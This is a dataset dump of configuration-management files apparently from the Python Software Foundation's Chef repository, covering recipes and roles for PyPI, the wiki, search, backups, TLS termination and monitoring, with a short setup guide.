"text": "include_recipe 'apache2'\ninclude_recipe 'apache2::mod_wsgi'\ninclude_recipe 'python'\n\npython_virtualenv '/srv/moin' do\n action :create\n owner 'root'\n group 'root'\nend\n\n{\n 'moin' => '1.9.6',\n 'python-openid' => '2.2.5',\n 'docutils' => '0.10',\n}.each do |name, ver|\n python_pip name do\n action :upgrade\n version ver\n virtualenv '/srv/moin'\n user 'root'\n group 'root'\n end\nend\n\ngroup 'moin' do\n system true\nend\n\nuser 'moin' do\n comment 'MoinMoin service'\n gid 'moin'\n system true\n shell '/bin/bash'\n home '/data/moin'\nend\n\ndirectory '/data' do\n owner 'root'\n group 'root'\n mode '755'\nend\n\ndirectory '/data/moin' do\n owner 'moin'\n group 'moin'\n mode '755'\nend\n\ndirectory '/data/www' do\n owner 'moin'\n group 'moin'\n mode '755'\nend\n\n# template \"#{node['apache']['dir']}/sites-available/wiki.python.org.conf\" do\n# source 'wiki.python.org.conf.erb'\n# owner 'root'\n# group 'root'\n# mode '644'\n# notifies :reload, 'service[apache2]'\n# end\n\n# apache_site 'wiki.python.org.conf'\n# apache_site 'default' do\n# enable false\n# end\n\n# template '/srv/moin/moin.wsgi' do\n# source 'moin.wsgi.erb'\n# owner 'root'\n# group 'root'\n# mode '644'\n# notifies :reload, 'service[apache2]'\n# end\n\n# %w{moin jython psf moin-pycon}.each do |wiki|\n# execute \"/srv/moin/bin/moin --config-dir=/data/moin/instances --wiki-url=http://wiki.python.org/#{wiki} maint cleancache\" do\n# action :nothing\n# user 'moin'\n# group 'moin'\n# subscribes :run, 'python_pip[moin]'\n# notifies :reload, 'service[apache2]'\n# end\n# end\n"
},
{
"alpha_fraction": 0.5523012280464172,
"alphanum_fraction": 0.573221743106842,
"avg_line_length": 28.875,
"blob_id": "3ca7c7eb1590a56b04c081aa1539240a95dd6cc5",
"content_id": "0aeb5c6085fc6a130fa3543148210f048002a49a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 239,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 8,
"path": "/cookbooks/psf-rsnapshot/metadata.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"psf-rsnapshot\"\nmaintainer \"Noah Kantrowitz\"\nmaintainer_email \"[email protected]\"\nlicense \"Apache 2.0\"\ndescription \"Setup backups for all PSF specific things\"\nversion \"0.0.2\"\n\ndepends \"rsnapshot\"\n"
},
{
"alpha_fraction": 0.875,
"alphanum_fraction": 0.875,
"avg_line_length": 31,
"blob_id": "82b1c29b18b6fef40877366924c413341e1cda64",
"content_id": "7ffc48845fc42b0a974165f89e4d0c7dd2df5e6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 32,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 1,
"path": "/cookbooks/psf-pycon/README.md",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "Configuration for pycon website\n"
},
{
"alpha_fraction": 0.7311828136444092,
"alphanum_fraction": 0.7311828136444092,
"avg_line_length": 30,
"blob_id": "b777e662173a728e95fb1f8606f2f8676011d95d",
"content_id": "c9aeb9e03bef1e58d0f5806c40a9d044201d99ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 3,
"path": "/cookbooks/rsnapshot/recipes/client.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "rsnapshot_client 'rsnapshot' do\n server_role node['rsnapshot']['client']['server_role']\nend\n"
},
{
"alpha_fraction": 0.6325274705886841,
"alphanum_fraction": 0.6474725008010864,
"avg_line_length": 20.66666603088379,
"blob_id": "d3cc9d8fae5baf8bd285e3e9f034f401a63ccd47",
"content_id": "f0e1bd08bc8a3867a1fba850a6a023067b50a3f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 2275,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 105,
"path": "/cookbooks/psf-pypi/recipes/pypi.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "# Make sure Nginx is installed\ninclude_recipe \"nginx\"\n\ndirectory '/var/run/pypi' do\n owner 'www-data'\nend\n\n# Install the pypi.python.org site\ntemplate \"#{node['nginx']['dir']}/sites-available/pypi.conf\" do\n source \"nginx_pypi.conf.erb\"\n\n owner \"root\"\n group \"root\"\n mode \"644\"\n\n variables ({\n :domains => [\n \"pypi.python.org\", \"cheeseshop.python.org\", \"a.pypi.python.org\",\n \"b.pypi.python.org\", \"d.pypi.python.org\", \"g.pypi.python.org\",\n ],\n :root_dir => \"/data/www/pypi\",\n :packages_dir => \"/data/packages\",\n :static_dir => \"/data/pypi/static\",\n :hsts_seconds => 31536000,\n :uwsgi_sock => \"unix:/var/run/pypi/pypi.sock\",\n :upload_size => \"100M\",\n :default_server => true,\n })\n\n notifies :reload, resources(:service => 'nginx')\nend\n\nnginx_site \"pypi.conf\" do\n enable true\nend\n\n# Install the packages.python.org site\ntemplate \"#{node['nginx']['dir']}/sites-available/packages.conf\" do\n source \"nginx_redirect.conf.erb\"\n\n owner \"root\"\n group \"root\"\n mode \"644\"\n\n variables ({\n :existing_domain => \"packages.python.org\",\n :new_domain => \"pythonhosted.org\",\n })\n\n notifies :reload, resources(:service => 'nginx')\nend\n\nnginx_site \"packages.conf\" do\n enable true\nend\n\n# Install the pythonhosted.org site\ntemplate \"#{node['nginx']['dir']}/sites-available/pythonhosted.conf\" do\n source \"nginx_static.conf.erb\"\n\n owner \"root\"\n group \"root\"\n mode \"644\"\n\n variables ({\n :domain => \"pythonhosted.org\",\n :root_dir => \"/data/packagedocs\",\n })\n\n notifies :reload, resources(:service => 'nginx')\nend\n\nnginx_site \"pythonhosted.conf\" do\n enable true\nend\n\n# Install the testpypi.python.org site\ntemplate \"#{node['nginx']['dir']}/sites-available/testpypi.conf\" do\n source \"nginx_pypi.conf.erb\"\n\n owner \"root\"\n group \"root\"\n mode \"644\"\n\n variables ({\n :domains => [\"testpypi.python.org\"],\n :root_dir => \"/data/www/testpypi\",\n :packages_dir => \"/data/testpackages\",\n :static_dir => \"/data/testpypi/static\",\n :hsts_seconds => 31536000,\n :uwsgi_sock => \"unix:/var/run/testpypi/pypi.sock\",\n :upload_size => \"100M\",\n })\n\n notifies :reload, resources(:service => 'nginx')\nend\n\nnginx_site \"testpypi.conf\" do\n enable true\nend\n\n# Disable the default site\nnginx_site \"default\" do\n enable false\nend\n"
},
{
"alpha_fraction": 0.6341463327407837,
"alphanum_fraction": 0.6585366129875183,
"avg_line_length": 15.199999809265137,
"blob_id": "92c50c4b59f93e8982d78d2ea43f5d982ab06836",
"content_id": "b763b616c2450c79be050d89d362ad051c334aff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 82,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 5,
"path": "/cookbooks/psf-misc/recipes/ntp.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "\ncron \"ntp resync\" do\n hour \"0\"\n minute \"0\"\n command \"service ntp restart\"\nend\n"
},
{
"alpha_fraction": 0.5589743852615356,
"alphanum_fraction": 0.6051282286643982,
"avg_line_length": 18.5,
"blob_id": "bd6089d802e5ceb2cfae73d62b2c889eb57c00a4",
"content_id": "de946270e7677636ac62bc2532f3c1c23681b582",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 390,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 20,
"path": "/cookbooks/psf-misc/files/default/fix-deny-hosts",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nIP_ADDR=\"$1\"\n\nif [[ ${IP_ADDR} =~ ^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$ ]]; then\n echo \"Cleaning up denyhosts for ${IP_ADDR}\"\nelse\n echo \"Sorry, you did not provide an actual ip address\"\n exit 1\nfi\n\nservice denyhosts stop\n\nfor file in /var/lib/denyhosts/*; do\n sed -i \"/${IP_ADDR}/d\" \"$file\"\ndone\n\nsed -i \"/${IP_ADDR}/d\" /etc/hosts.deny\n\nservice denyhosts start\n"
},
{
"alpha_fraction": 0.5463917255401611,
"alphanum_fraction": 0.5721649527549744,
"avg_line_length": 31.33333396911621,
"blob_id": "f8f6d439802905dcfd8632fc3e2d2a3dbd6d1ca9",
"content_id": "f8391afafcd5669565e254f6c491b5ba6afa4a58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 194,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 6,
"path": "/cookbooks/pgbouncer/metadata.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"pgbouncer\"\nmaintainer \"Noah Kantrowitz\"\nmaintainer_email \"[email protected]\"\nlicense \"Apache 2.0\"\ndescription \"Install and configure pgbouncer\"\nversion \"0.0.1\"\n"
},
{
"alpha_fraction": 0.647679328918457,
"alphanum_fraction": 0.6645569801330566,
"avg_line_length": 25.33333396911621,
"blob_id": "2e17543504d8f51685aea4fc770bc77bce81feb5",
"content_id": "fbaf6a7f0e2a08128b4c3ef6f4a4c31cdf0b16bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 474,
"license_type": "no_license",
"max_line_length": 233,
"num_lines": 18,
"path": "/cookbooks/psf-misc/recipes/backup.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "BACKUPS_KEYS = [\n \"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA43FpT4Ig2p8QFo4QjaZ5NVwE7k45wzRPE8jCASiFgtIdcfCF/i/2nSphkapwiJCWFiT66Au48RJRP6HnRwadi0AxlKdun/iWcUPsIMlU6P2EefU4Ol8Vdgg6aTAaKVeLKto5+Z9FXGkd5BCU8QLmm/5F8qsckHmgV0cpeSCdl7rFHXSp4OJE3gTDKPY7rJVIdHZ8NkdV6L63Yd/encXotVddroPS+q92wr5nc/w8g16SpmXuIbwDbkS+sCkZY5N8ByYgq/Vcs1RtCnzvEEWmIwgz6JlZt1l8ISK9hpbNOZUDuWo5mVbGQRx0qCeLoDDWxI7TZRI6/lQbW4f0uwStww==\",\n]\n\ndirectory \"/root/.ssh\" do\n owner \"root\"\n group \"root\"\n mode \"755\"\nend\n\ntemplate \"/root/.ssh/authorized_keys\" do\n cookbook \"user\"\n source \"authorized_keys.erb\"\n owner \"root\"\n group \"root\"\n mode \"644\"\n variables :user => \"root\", :ssh_keys => BACKUPS_KEYS.map{|key| %Q{no-pty,no-agent-forwarding,no-X11-forwarding,no-port-forwarding,command=\"rsync --server --sender -lHogDtpre.i --ignore-errors --numeric-ids --inplace . /\" #{key}}}\nend\n"
},
{
"alpha_fraction": 0.6474999785423279,
"alphanum_fraction": 0.6675000190734863,
"avg_line_length": 29.69230842590332,
"blob_id": "c772fa5812808d273553a12f74141e2e174be198",
"content_id": "bca669fa53aa85039facc18553347f7fab518470",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 400,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 13,
"path": "/Makefile",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "delete:\n\tknife ec2 server list | tail +2 | grep running | awk '{print $$1;}' | xargs -n 1 knife ec2 server delete -y\n\tyes | knife node bulk_delete 'i-.*'\n\nip:\n\t@knife ec2 server list | tail +2 | grep running | awk '{print $$2;}'\n\nssh:\n\tssh -o StrictHostKeyChecking=no \"ubuntu@$$(make ip)\"\n\ntrace:\n\t@ssh -o StrictHostKeyChecking=no \"ubuntu@$$(make ip)\" cat /var/chef/cache/chef-stacktrace.out\n\t@echo\n\n"
},
{
"alpha_fraction": 0.6833333373069763,
"alphanum_fraction": 0.6833333373069763,
"avg_line_length": 16.14285659790039,
"blob_id": "ecc14b772a6e4eb7a0f44b7968452f921e5f9e33",
"content_id": "36a3b1b7fc475170154949f2790447d03b1e85ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 120,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 7,
"path": "/roles/coverity.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"coverity\"\ndescription \"Coverity scan server\"\n# Owner: Christian Heimes <[email protected]>\n\nrun_list [\n \"recipe[build-essential]\",\n]\n"
},
{
"alpha_fraction": 0.7721518874168396,
"alphanum_fraction": 0.7721518874168396,
"avg_line_length": 25.33333396911621,
"blob_id": "e9550b687719641d8c228a50ae95cd6c973ba140",
"content_id": "1675a6efdf6556cb33d229c3b7b3c3209361a8c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 79,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 3,
"path": "/roles/python-speed.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"python-speed\"\ndescription \"speed.python.org runner box\"\n# fijal is owner\n"
},
{
"alpha_fraction": 0.6985915303230286,
"alphanum_fraction": 0.6985915303230286,
"avg_line_length": 22.66666603088379,
"blob_id": "976500d80c8e0a8f13ffdcfbbdd25ce712f473e4",
"content_id": "1fec25dcd043ebacd71a896daf481f204836adb2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 355,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 15,
"path": "/cookbooks/psf-debbuild/recipes/warehouse.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "# Install the PyPy PPA\napt_repository \"pypy\" do\n uri \"http://ppa.launchpad.net/pypy/ppa/ubuntu\"\n distribution node['lsb']['codename']\n components [\"main\"]\n keyserver \"keyserver.ubuntu.com\"\n key \"2862D0785AFACD8C65B23DB0251104D968854915\"\nend\n\n# Install PyPy\npackage \"pypy\"\n\n# Install Invoke\npython_pip \"invoke\" do action :upgrade end\npython_pip \"wheel\" do action :upgrade end\n"
},
{
"alpha_fraction": 0.8062826991081238,
"alphanum_fraction": 0.8062826991081238,
"avg_line_length": 46.75,
"blob_id": "39a9d0c8eb42260c5ce2a5d123d6fed42b410285",
"content_id": "796ede3ede60891cdcd2553fc7a577227eb042b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 191,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 4,
"path": "/cookbooks/pypy-codespeed/README.md",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "Configuration for speed.pypy.org has moved to salt:\nhttps://github.com/python/psf-salt/tree/master/salt/codespeed\nand\nhttps://github.com/python/psf-salt/blob/master/pillar/base/codespeed.sls\n"
},
{
"alpha_fraction": 0.7178851962089539,
"alphanum_fraction": 0.7191243171691895,
"avg_line_length": 25.899999618530273,
"blob_id": "06d2c89cdae41c3ed7446f1e9daeff713e502b5b",
"content_id": "e77b9944ad49d9280f5648abcbb146588e421728",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 2421,
"license_type": "no_license",
"max_line_length": 376,
"num_lines": 90,
"path": "/doc/getting-started.rst",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "Getting started with this repo\n==============================\n\nThe goal of this document is to get you to a working state with the repo.\n\nBy the end of this you should be able to run these commands:\n\n* `bundle exec knife node list`\n* `bundle exec berks list`\n* `bundle exec rake docs`\n\nConfiguration\n-------------\n\nThe repository uses two configuration files.\n\n* `config/rake.rb`\n* `.chef/knife.rb`\n\nThe first, `config/rake.rb` configures the Rakefile in two sections.\n\n* Constants used in the `ssl_cert` task for creating the certificates.\n* Constants that set the directory locations used in various tasks.\n\nIf you use the `ssl_cert` task, change the values in the `config/rake.rb` file appropriately. These values were also used in the `new_cookbook` task, but that task is replaced by the `knife cookbook create` command which can be configured below.\n\nThe second config file, `.chef/knife.rb` is a repository specific configuration file for knife. If you're using the Opscode Platform, you can download one for your organization from the management console. If you're using the Open Source Chef Server, you can generate a new one with `knife configure`. For more information about configuring Knife, see the Knife documentation.\n\nhttp://help.opscode.com/faqs/chefbasics/knife\n\nSetting up a development environment\n------------------------------------\n\nSome things you'll need:\n\n * this repo, cloned locally\n * ruby 1.9\n * the chef validator key\n * a valid chef client key\n\nSome things to consider:\n\n * rbenv: https://github.com/sstephenson/rbenv (via rbenv installer https://github.com/fesplugas/rbenv-installer)\n\nSome common steps:\n\n::\n\n $ gem install bundler\n\n # get our ruby dependencies\n # Create local binstubs and install the gems right here.\n $ bundle install --binstubs --path .gems\n\n # get our chef cookbook dependencies\n $ bundle exec berks install\n\nManaging Cookbooks\n------------------\n\nWe use berkshelf to manage our cookbooks and dependencies. Berkshelf is\nstraight forward.\n\nTo get started with it, look here: http://berkshelf.com/\n\nFrom the command line, it looks like this:\n\nList all of our cookbooks\n\n::\n\n $ bundle exec berks list\n\nInstall all our 3rd party dependencies\n\n::\n\n $ bundle exec berks install\n\nUpload a cookbook managed by berkshelf\n\n::\n\n $ bundle exec berks upload <cookbook>\n\nCreate a new cookbook\n\n::\n\n $ bundle exec berks cookbook <cookbook_name>\n"
},
{
"alpha_fraction": 0.670708954334259,
"alphanum_fraction": 0.6986940503120422,
"avg_line_length": 17.807018280029297,
"blob_id": "a4ddae4d111ef3921ccda5c0267c5610e68d4de1",
"content_id": "34f0090390ed2b882e2ddfbf57adf03c0b16e136",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1072,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 57,
"path": "/cookbooks/psf-search/recipes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "# Make sure Nginx is installed\ninclude_recipe \"nginx\"\n\nsecrets = data_bag_item(\"secrets\", \"elasticsearch\")\n\nfile \"#{node['nginx']['dir']}/htpasswd\" do\n content \"#{secrets['username']}:{PLAIN}#{secrets['password']}\"\n\n owner \"root\"\n group \"www-data\"\n mode \"640\"\n\n notifies :reload, resources(:service => 'nginx')\nend\n\ntemplate \"#{node['nginx']['dir']}/sites-available/elasticsearch.conf\" do\n source \"elasticsearch.conf.erb\"\n\n owner \"root\"\n group \"root\"\n mode \"644\"\n\n notifies :reload, resources(:service => 'nginx')\nend\n\nnginx_site \"elasticsearch.conf\" do\n enable true\nend\n\nnginx_site \"default\" do\n enable false\nend\n\n\n# Setup the Firewall to disallow ElasticSearch not via Nginx from anything other\n# than other ES nodes.\nfirewall \"ufw\" do\n action :enable\nend\n\nfirewall_rule \"ssh\" do\n port 22\n action :allow\n notifies :enable, 'firewall[ufw]'\nend\n\nfirewall_rule \"elasticsearch-nginx\" do\n port 8200\n action :allow\nend\n\nfirewall_rule \"elasticsearch-internal\" do\n protocol :tcp\n port_range 9200..9400\n source \"192.168.3.0/24\"\n action :allow\nend\n"
},
{
"alpha_fraction": 0.7472527623176575,
"alphanum_fraction": 0.7472527623176575,
"avg_line_length": 29.33333396911621,
"blob_id": "0d5fbf2bf7e9ee15e416435a3dac0997f4896a01",
"content_id": "9353121d65be2bbf1ce801da0dddced62d5984b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 91,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 3,
"path": "/roles/pyramid-community.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"pyramid-community\"\ndescription \"Pyramid community website\"\n# Owner: Blaise Laflamme <[email protected]>\n"
},
{
"alpha_fraction": 0.7698412537574768,
"alphanum_fraction": 0.7698412537574768,
"avg_line_length": 24.200000762939453,
"blob_id": "28f9b66ac279e99bad53a0697ee0407745a0e059",
"content_id": "0c76b1f3dcbfb7783c54c9a3490dc28afd9c19f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 126,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 5,
"path": "/cookbooks/psf-monitoring/recipes/client.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "include_recipe \"collectd::client_graphite\"\n\n%w(disk load cpu memory interface swap).each do |plug|\n collectd_plugin plug\nend\n"
},
{
"alpha_fraction": 0.5283267498016357,
"alphanum_fraction": 0.5375494360923767,
"avg_line_length": 20.685714721679688,
"blob_id": "0481a74d9cd6f94f9d2b1a5383e6b83fa1dd5830",
"content_id": "688f0e036494a47924b6bb2b6765439a8e52115f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 759,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 35,
"path": "/roles/pypi.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"pypi\"\ndescription \"Python package index server\"\nrun_list [\n 'recipe[rsyslog::server]',\n 'recipe[psf-postgresql::92]',\n 'recipe[psf-pypi::pgbouncer]',\n 'recipe[psf-pypi::logging]',\n 'recipe[psf-pypi::pypi]',\n 'recipe[psf-pypi::warehouse]',\n 'recipe[psf-pypi]'\n]\noverride_attributes({\n :warehouse => {\n :domains => [\"preview-pypi.python.org\"],\n },\n :pypi => {\n :web => {\n :database => {\n :hostname => \"localhost\",\n },\n },\n },\n :nginx => {\n # We disable gzip because of BREACH\n :gzip => \"off\",\n },\n :rsyslog => {\n :port => 51450,\n :user => \"root\",\n :group => \"admin\",\n :log_dir => \"/var/log/rsyslog\",\n :per_host_dir => \"%HOSTNAME%\",\n :high_precision_timestamps => true,\n },\n})\n"
},
{
"alpha_fraction": 0.6211180090904236,
"alphanum_fraction": 0.6236025094985962,
"avg_line_length": 27.75,
"blob_id": "d7ea2b713ad6eefa2406c87d89b52643b3cc869a",
"content_id": "b3bc096c7da98b499d13ad549a3f6c988c6b3f8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 805,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 28,
"path": "/cookbooks/rsnapshot/resources/backup.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "default_action :backup\nactions :remove\n\nattribute :directory, :kind_of => String, :name_attribute => true\nattribute :options, :kind_of => String, :default => ''\nattribute :_exclude, :kind_of => Array, :default => []\ndef exclude(*args)\n if args.length == 0\n self._exclude\n else\n args.flatten!\n self._exclude.push(*args)\n end\nend\n\ndef full_options\n options = self.options.split(',').inject({}) do |pair, memo|\n key, val = pair.split('=', 2)\n memo[key] = val\n memo\n end\n unless self.exclude.empty?\n rsync_long_args = options['rsync_long_args'] || (options['+rsync_long_args'] ||= '')\n rsync_long_args << ' ' unless rsync_long_args.empty?\n rsync_long_args << self.exclude.map{|path| \"--exclude=#{path}\"}.join(' ')\n end\n options.map{|key, val| \"#{key}=#{val}\"}.join(',')\nend\n"
},
{
"alpha_fraction": 0.53125,
"alphanum_fraction": 0.5454545617103577,
"avg_line_length": 16.600000381469727,
"blob_id": "2565f663d6f525a94f9f3188040b076c667dd701",
"content_id": "ce1170c2b63ff9bc692f9a6e726c854a66d48efd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 352,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 20,
"path": "/roles/elasticsearch.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"elasticsearch\"\ndescription \"Search Index Server\"\nrun_list [\n \"recipe[java]\",\n \"recipe[elasticsearch]\",\n \"recipe[psf-search]\",\n]\noverride_attributes({\n :elasticsearch => {\n :version => \"0.90.6\",\n :network => {\n :host => \"_eth2_\",\n },\n },\n :java => {\n :oracle => {\n \"accept_oracle_download_terms\" => true\n },\n },\n})\n"
},
{
"alpha_fraction": 0.6966824531555176,
"alphanum_fraction": 0.7156398296356201,
"avg_line_length": 29,
"blob_id": "32a2fa23ed4048cbf022985d2733045d5e3e8c84",
"content_id": "88e5352defc216f13ad8e0185d036ed71cf2666d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 7,
"path": "/cookbooks/psf-misc/README.md",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "Misc. stuffs to configure PSF systems.\n\n##Scripts Usage\n\n###fix-deny-hosts\n - run this ala `sudo fix-deny-hosts 0.0.0.0` to unbannnnnnn an ip\n - don't worry, it'll try to keep you from doing something stupid\n\n"
},
{
"alpha_fraction": 0.6142321825027466,
"alphanum_fraction": 0.6142321825027466,
"avg_line_length": 19.538461685180664,
"blob_id": "8bb9dfcb332c883f97327faaad2564c6d4cf9d9a",
"content_id": "ecabff3f05c7ae5ddb2510ebc1b929975f620d7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 267,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 13,
"path": "/roles/debbuild.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"debbuild\"\ndescription \"Ubuntu APT Server\"\nrun_list [\n \"recipe[java]\",\n \"recipe[reprepro]\",\n \"recipe[psf-debbuild]\",\n \"recipe[psf-debbuild::warehouse]\",\n]\noverride_attributes({\n :reprepro => {\n :enable_repository_on_host => true,\n },\n})\n"
},
{
"alpha_fraction": 0.6991150379180908,
"alphanum_fraction": 0.6991150379180908,
"avg_line_length": 17.83333396911621,
"blob_id": "829e854c2691c40ae9e799bad89defa7362e1b1f",
"content_id": "61ef0fe0995740d54a34113dd30a5c1d07a12c8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 113,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 6,
"path": "/roles/monitoring.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"monitoring\"\ndescription \"Nagios and etc\"\n# Owners: Noah Kantrowitz\nrun_list [\n \"recipe[psf-monitoring::server]\",\n]\n"
},
{
"alpha_fraction": 0.6382716298103333,
"alphanum_fraction": 0.6790123581886292,
"avg_line_length": 22.823530197143555,
"blob_id": "5751e50c1944d25a2c8214fbaf5d4f521b3cb42d",
"content_id": "be6ff2ef3fbbd26a5494528a46696db56573b749",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 810,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 34,
"path": "/cookbooks/psf-loadbalancer/recipes/stud.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "directory '/var/lib/stud' do\n owner 'root'\n group 'root'\n mode '700'\nend\n\ndomains = %w{pycon.org pythonhosted.org raspberry.io python.org}\n\n# Force the owner and permissions to be safe\ndomains.each do |domain|\n file \"/etc/ssl/private/#{domain}.pem\" do\n owner 'root'\n group 'root'\n mode '600'\n only_if { ::File.exists?(\"/etc/ssl/private/#{domain}.pem\") }\n end\nend\n\nstud 'stud' do\n version '0.3-2-ef1745'\n pem_file domains.map{|domain| \"/etc/ssl/private/#{domain}.pem\" }\n frontend '[*]:443'\n tls false\n ssl true\n ciphers 'ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+3DES:DH+3DES:RSA+AES:RSA+3DES:!ADH:!AECDH:!MD5'\n prefer_server_ciphers true\n user 'nobody'\n group 'nogroup'\n chroot '/var/lib/stud'\n syslog true\n write_proxy true\n workers 4\n backlog 500\nend\n"
},
{
"alpha_fraction": 0.5950704216957092,
"alphanum_fraction": 0.5950704216957092,
"avg_line_length": 20.846153259277344,
"blob_id": "161fcdd05ab56adc659d6b6e527ed2c1cbeac049",
"content_id": "6174b7398e5d5e842a872380ad4c1d56ef310f0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 284,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 13,
"path": "/cookbooks/rsnapshot/recipes/backupall.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "rsnapshot_backup '/' do\n exclude '/dev/*'\n exclude '/media/*'\n exclude '/mnt/*'\n exclude '/proc/*'\n exclude '/sys/*'\n exclude '/tmp/*'\n exclude '/var/cache/apt/archives/*'\n exclude '/var/lib/schroot/*'\n exclude '/var/lock/*'\n exclude '/var/run/*'\n exclude '/var/tmp/*'\nend\n"
},
{
"alpha_fraction": 0.6115108132362366,
"alphanum_fraction": 0.6366906762123108,
"avg_line_length": 20.384614944458008,
"blob_id": "d23b87baaf8aa60e61c4d7127b3daae3dc7b561d",
"content_id": "e5c74a798668eee7742fd43a3f55487dc26310ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 278,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 13,
"path": "/cookbooks/psf-pypi/recipes/logging.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "template \"/etc/rsyslog.d/25-pypi-logging.conf\" do\n source \"25-pypi-logging.conf.erb\"\n backup false\n variables(\n :cdn => node[\"pypi\"][\"cdn\"][\"logging\"],\n )\n\n owner \"root\"\n group \"root\"\n mode \"644\"\n\n notifies :restart, \"service[#{node['rsyslog']['service_name']}]\"\nend\n"
},
{
"alpha_fraction": 0.6651749610900879,
"alphanum_fraction": 0.6745321154594421,
"avg_line_length": 27.917646408081055,
"blob_id": "aefdd6f40d85c3397537b5786639d53040a836ad",
